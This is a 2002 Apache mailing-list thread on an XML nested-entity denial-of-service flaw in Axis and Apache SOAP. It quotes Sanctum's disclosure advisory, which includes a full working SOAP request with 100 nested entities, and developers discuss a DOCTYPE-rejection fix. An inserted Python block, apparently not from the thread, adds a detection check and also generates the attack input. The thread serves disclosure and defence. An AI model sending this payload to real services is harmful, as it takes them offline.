Posted to soap-dev@ws.apache.org by Scott Nichol <sn...@scottnichol.com> on 2002/11/27 00:13:46 UTC

Re: Fw: Security Alert - Apache/Axis

I notice that the Axis solution is brute force: refuse to process any
request with a DTD.  Since Apache SOAP reads the envelope into a string
before parsing it to a DOM, a similarly brute-force approach would be to
refuse to process any envelope containing <!DOCTYPE.  (If this were
intended to be a valid part of parameter data, the < would be &lt;.)

Scott Nichol
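As an added illustration (not code from this thread, from Apache SOAP or from Axis), assuming only the entity scheme the quoted advisory describes: `has_doctype` is the raw-string `<!DOCTYPE` test proposed above, and `expanded_sizes` goes beyond the thread by sizing each entity's expansion from the declarations alone, so an operator can see the 5 * 2^100 bytes behind the quoted request without ever expanding it. All function names are mine, and `nested_entity_dtd` only constructs test input in the advisory's shape.

```python
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&(\w+);')

def nested_entity_dtd(depth, leaf="hello"):
    """Constructed DTD in the advisory's shape: x0 is a literal string and
    every x<i> is two copies of x<i-1>; the request in the thread uses 100."""
    decls = [f'<!ENTITY x0 "{leaf}">']
    decls += [f'<!ENTITY x{i} "&x{i-1};&x{i-1};">' for i in range(1, depth + 1)]
    return "<!DOCTYPE foobar [\n" + "\n".join(decls) + "\n]>"

def has_doctype(envelope):
    """Scott Nichol's brute-force check on the raw envelope string. A literal
    '<!DOCTYPE' can only be a DTD: inside parameter data the '<' would be &lt;."""
    return "<!DOCTYPE" in envelope

def expanded_sizes(dtd):
    """Characters each internal entity would expand to, computed from the
    declarations alone; memoised, so linear in the number of declarations."""
    defs = dict(ENTITY_DECL.findall(dtd))
    sizes = {}
    def size(name, stack=()):
        if name in sizes:
            return sizes[name]
        if name in stack:
            raise ValueError(f"recursive entity {name}")  # illegal in XML 1.0
        value = defs[name]
        total = len(ENTITY_REF.sub("", value))           # literal text
        for ref in ENTITY_REF.findall(value):
            # predefined entities (&lt; etc.) expand to a single character
            total += size(ref, stack + (name,)) if ref in defs else 1
        sizes[name] = total
        return total
    for name in defs:
        size(name)
    return sizes

def largest_expansion(dtd):
    """Worst case that a single reference in the document body could expand to."""
    return max(expanded_sizes(dtd).values(), default=0)

if __name__ == "__main__":
    dtd = nested_entity_dtd(100)
    attack = '<?xml version="1.0" ?>\n' + dtd          # envelope body omitted
    benign = '<foobar xsi:type="xsd:string">&lt;!DOCTYPE is only text</foobar>'
    print("attack envelope refused:", has_doctype(attack))   # True
    print("benign envelope refused:", has_doctype(benign))   # False
    print("bytes if &x100; were expanded:", largest_expansion(dtd))  # 5 * 2**100
```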

----- Original Message -----
From: "Sanjiva Weerawarana" <sa...@watson.ibm.com>
To: <ax...@xml.apache.org>; <xe...@xml.apache.org>;
<di...@yahoo.com>; <to...@apache.org>
Cc: <ax...@xml.apache.org>
Sent: Tuesday, November 26, 2002 4:46 PM
Subject: Re: Fw: Security Alert - Apache/Axis


> Note that this vulnerability exists in Apache SOAP because we use
> the DOM parser and there's no way to turn off entity expansion
> AFAIK. The only solution would be to do some Xerces specific thing
> and lose the JAXP capability .. which would suck.
>
> Sanjiva.
>
> ----- Original Message -----
> From: "Dirk-Willem van Gulik" <di...@webweaving.org>
> To: <xe...@xml.apache.org>; <di...@yahoo.com>; <to...@apache.org>
> Cc: <ax...@xml.apache.org>
> Sent: Tuesday, November 26, 2002 4:27 PM
> Subject: Re: Fw: Security Alert - Apache/Axis
>
>
> >
> > Tom/Dims,
> >
> > Could you folks verify this and report back to security@apache.org that
> > each of those are 100% taken care of ?
> >
> > Then security@ can report back to the various constituencies, work with
> > CERT if that is needed, etc. If you have any thoughts/statement which need
> > to be added - make sure you add that.
> >
> > Dw
> >
> > On Tue, 26 Nov 2002, Davanum Srinivas wrote:
> >
> > > I think tom fixed it
> > > (http://marc.theaimsgroup.com/?l=axis-dev&m=103773176108393&w=2)
> > >
> > > Thanks,
> > > dims
> > >
> > > --- Ted Leung <tw...@sauria.com> wrote:
> > > > This security alert came through today.
> > > >
> > > > Ted
> > > > ----- Original Message -----
> > > > From: "Ian Holsman" <ia...@cnet.com>
> > > > To: <se...@apache.org>
> > > > Cc: "Ory Segal" <OR...@sanctuminc.com>
> > > > Sent: Tuesday, November 26, 2002 8:02 AM
> > > > Subject: Security Alert - Apache/Axis
> > > >
> > > >
> > > > > Dear security@apache.org,
> > > > >
> > > > > During a recent security audit at one of our customers, Sanctum found a
> > > > > security vulnerability in your product Apache/Axis.
> > > > > The details of this vulnerability are described in the attached text file.
> > > > >
> > > > > We intend to issue a public advisory on BugTraq, SecuriTeam and other site
> > > > > forums about this vulnerability the last week of November. Please note,
> > > > > the advisory will not contain specifics that might enable someone to exploit
> > > > > the vulnerability.
> > > > >
> > > > > We would appreciate it if you could issue a patch in that timeline (i.e.
> > > > > around November 25th), so it can be linked to our advisory.
> > > > >
> > > > > Please feel free to contact me for more information/help.
> > > > >
> > > > > Thanks,
> > > > > -Amit
> > > > >
> > > > >  <<XML_DTD_Axis.txt>>
> > > > >
> > > >
> > > > ///////////////////////////////////////////////////////////////////////
> > > > ========================>> Security Advisory <<========================
> > > > ///////////////////////////////////////////////////////////////////////
> > > >
> > > >
> > > > => Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/
> > > >
> > > > => Release date: 14/Nov/2002
> > > >
> > > > => Vendor: Apache Group
> > > >
> > > > The following product was found to be vulnerable:
> > > >
> > > >   - Apache Axis SOAP server (checked with Xerces-J and Tomcat)
> > > >
> > > > The versions affected are the latest ones (as of October 2002).
> > > >
> > > > => Severity: High
> > > >
> > > > => CVE candidate: Not assigned yet.
> > > >
> > > > => Summary: Using the DTD part of the XML document, it is possible to
> > > > cause the XML parser to consume 100% CPU and/or a lot of memory, therefore
> > > > resulting in a denial of service condition.
> > > >
> > > > => Description: The DTD part of the XML document enables the document
> > > > to define named entities (other than the predefined &lt;, &gt;, etc.). The
> > > > entities can be defined using other entities (recursion is prohibited in
> > > > XML 1.0). Entities are expanded when they are referenced, inside the XML
> > > > document.
> > > > The attack is comprised of defining and referencing an entity which is
> > > > defined using two instances of another entity, which is (in turn) defined
> > > > as two instances of yet another entity, and so on. This definition process
> > > > can be repeated as long as "necessary" - we found that a nesting level of
> > > > 100 is usually sufficient.
> > > > The 100th entity should be defined simply as a string. This has the effect
> > > > of having the first entity contain, in theory, 2^99 (two to the power of
> > > > ninety nine) concatenated values of the 100th entity.
> > > > Here's an example (the DTD is to be placed after the XML declaration, and
> > > > before the root element of the XML document):
> > > >
> > > > <!DOCTYPE root [
> > > > <!ENTITY x100 "foobar">
> > > > <!ENTITY  x99 "&x100;&x100;">
> > > > <!ENTITY  x98 "&x99;&x99;">
> > > > <!ENTITY  x97 "&x98;&x98;">
> > > > ...
> > > > <!ENTITY   x3 "&x4;&x4;">
> > > > <!ENTITY   x2 "&x3;&x3;">
> > > > <!ENTITY   x1 "&x2;&x2;">
> > > > ]>
> > > >
> > > > Referring to the first entity inside a document that would otherwise be
> > > > accepted by the application (using the syntax &x1;), results in a DoS
> > > > condition, due to the excessive CPU load and/or memory load required by the
> > > > XML parser to expand this entity.
> > > >
> > > > => Solution: Not available yet.
> > > >
> > > > => Workaround: Not available yet.
> > > >
> > > > => Example:
> > > >
> > > > Ory Segal from Sanctum devised a SOAP request that manages to mount this
> > > > attack requiring only a path to an existing web service to be known to the
> > > > attacker.
> > > >
> > > > The request is:
> > > >
> > > > POST path_to_web_service HTTP/1.0
> > > > Host: ...
> > > > Content-Type: text/xml
> > > > SOAPAction: ""
> > > > Content-Length: 3224
> > > >
> > > > <?xml version="1.0" ?>
> > > > <!DOCTYPE foobar [
> > > > <!ENTITY x0 "hello">
> > > > <!ENTITY x1 "&x0;&x0;">
> > > > <!ENTITY x2 "&x1;&x1;">
> > > > <!ENTITY x3 "&x2;&x2;">
> > > > <!ENTITY x4 "&x3;&x3;">
> > > > <!ENTITY x5 "&x4;&x4;">
> > > > <!ENTITY x6 "&x5;&x5;">
> > > > <!ENTITY x7 "&x6;&x6;">
> > > > <!ENTITY x8 "&x7;&x7;">
> > > > <!ENTITY x9 "&x8;&x8;">
> > > > <!ENTITY x10 "&x9;&x9;">
> > > > <!ENTITY x11 "&x10;&x10;">
> > > > <!ENTITY x12 "&x11;&x11;">
> > > > <!ENTITY x13 "&x12;&x12;">
> > > > <!ENTITY x14 "&x13;&x13;">
> > > > <!ENTITY x15 "&x14;&x14;">
> > > > <!ENTITY x16 "&x15;&x15;">
> > > > <!ENTITY x17 "&x16;&x16;">
> > > > <!ENTITY x18 "&x17;&x17;">
> > > > <!ENTITY x19 "&x18;&x18;">
> > > > <!ENTITY x20 "&x19;&x19;">
> > > > <!ENTITY x21 "&x20;&x20;">
> > > > <!ENTITY x22 "&x21;&x21;">
> > > > <!ENTITY x23 "&x22;&x22;">
> > > > <!ENTITY x24 "&x23;&x23;">
> > > > <!ENTITY x25 "&x24;&x24;">
> > > > <!ENTITY x26 "&x25;&x25;">
> > > > <!ENTITY x27 "&x26;&x26;">
> > > > <!ENTITY x28 "&x27;&x27;">
> > > > <!ENTITY x29 "&x28;&x28;">
> > > > <!ENTITY x30 "&x29;&x29;">
> > > > <!ENTITY x31 "&x30;&x30;">
> > > > <!ENTITY x32 "&x31;&x31;">
> > > > <!ENTITY x33 "&x32;&x32;">
> > > > <!ENTITY x34 "&x33;&x33;">
> > > > <!ENTITY x35 "&x34;&x34;">
> > > > <!ENTITY x36 "&x35;&x35;">
> > > > <!ENTITY x37 "&x36;&x36;">
> > > > <!ENTITY x38 "&x37;&x37;">
> > > > <!ENTITY x39 "&x38;&x38;">
> > > > <!ENTITY x40 "&x39;&x39;">
> > > > <!ENTITY x41 "&x40;&x40;">
> > > > <!ENTITY x42 "&x41;&x41;">
> > > > <!ENTITY x43 "&x42;&x42;">
> > > > <!ENTITY x44 "&x43;&x43;">
> > > > <!ENTITY x45 "&x44;&x44;">
> > > > <!ENTITY x46 "&x45;&x45;">
> > > > <!ENTITY x47 "&x46;&x46;">
> > > > <!ENTITY x48 "&x47;&x47;">
> > > > <!ENTITY x49 "&x48;&x48;">
> > > > <!ENTITY x50 "&x49;&x49;">
> > > > <!ENTITY x51 "&x50;&x50;">
> > > > <!ENTITY x52 "&x51;&x51;">
> > > > <!ENTITY x53 "&x52;&x52;">
> > > > <!ENTITY x54 "&x53;&x53;">
> > > > <!ENTITY x55 "&x54;&x54;">
> > > > <!ENTITY x56 "&x55;&x55;">
> > > > <!ENTITY x57 "&x56;&x56;">
> > > > <!ENTITY x58 "&x57;&x57;">
> > > > <!ENTITY x59 "&x58;&x58;">
> > > > <!ENTITY x60 "&x59;&x59;">
> > > > <!ENTITY x61 "&x60;&x60;">
> > > > <!ENTITY x62 "&x61;&x61;">
> > > > <!ENTITY x63 "&x62;&x62;">
> > > > <!ENTITY x64 "&x63;&x63;">
> > > > <!ENTITY x65 "&x64;&x64;">
> > > > <!ENTITY x66 "&x65;&x65;">
> > > > <!ENTITY x67 "&x66;&x66;">
> > > > <!ENTITY x68 "&x67;&x67;">
> > > > <!ENTITY x69 "&x68;&x68;">
> > > > <!ENTITY x70 "&x69;&x69;">
> > > > <!ENTITY x71 "&x70;&x70;">
> > > > <!ENTITY x72 "&x71;&x71;">
> > > > <!ENTITY x73 "&x72;&x72;">
> > > > <!ENTITY x74 "&x73;&x73;">
> > > > <!ENTITY x75 "&x74;&x74;">
> > > > <!ENTITY x76 "&x75;&x75;">
> > > > <!ENTITY x77 "&x76;&x76;">
> > > > <!ENTITY x78 "&x77;&x77;">
> > > > <!ENTITY x79 "&x78;&x78;">
> > > > <!ENTITY x80 "&x79;&x79;">
> > > > <!ENTITY x81 "&x80;&x80;">
> > > > <!ENTITY x82 "&x81;&x81;">
> > > > <!ENTITY x83 "&x82;&x82;">
> > > > <!ENTITY x84 "&x83;&x83;">
> > > > <!ENTITY x85 "&x84;&x84;">
> > > > <!ENTITY x86 "&x85;&x85;">
> > > > <!ENTITY x87 "&x86;&x86;">
> > > > <!ENTITY x88 "&x87;&x87;">
> > > > <!ENTITY x89 "&x88;&x88;">
> > > > <!ENTITY x90 "&x89;&x89;">
> > > > <!ENTITY x91 "&x90;&x90;">
> > > > <!ENTITY x92 "&x91;&x91;">
> > > > <!ENTITY x93 "&x92;&x92;">
> > > > <!ENTITY x94 "&x93;&x93;">
> > > > <!ENTITY x95 "&x94;&x94;">
> > > > <!ENTITY x96 "&x95;&x95;">
> > > > <!ENTITY x97 "&x96;&x96;">
> > > > <!ENTITY x98 "&x97;&x97;">
> > > > <!ENTITY x99 "&x98;&x98;">
> > > > <!ENTITY x100 "&x99;&x99;">
> > > > ]>
> > > > <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
> > > > xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"
> > > > xmlns:xsd="http://www.w3.org/1999/XMLSchema">
> > > > <SOAP-ENV:Body>
> > > > <ns1:aaa xmlns:ns1="urn:aaa" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
> > > > <foobar xsi:type="xsd:string">&x100;</foobar>
> > > > </ns1:aaa>
> > > > </SOAP-ENV:Body>
> > > > </SOAP-ENV:Envelope>
> > > >
> > > >
> > >
> > >
> > > =====
> > > Davanum Srinivas - http://xml.apache.org/~dims/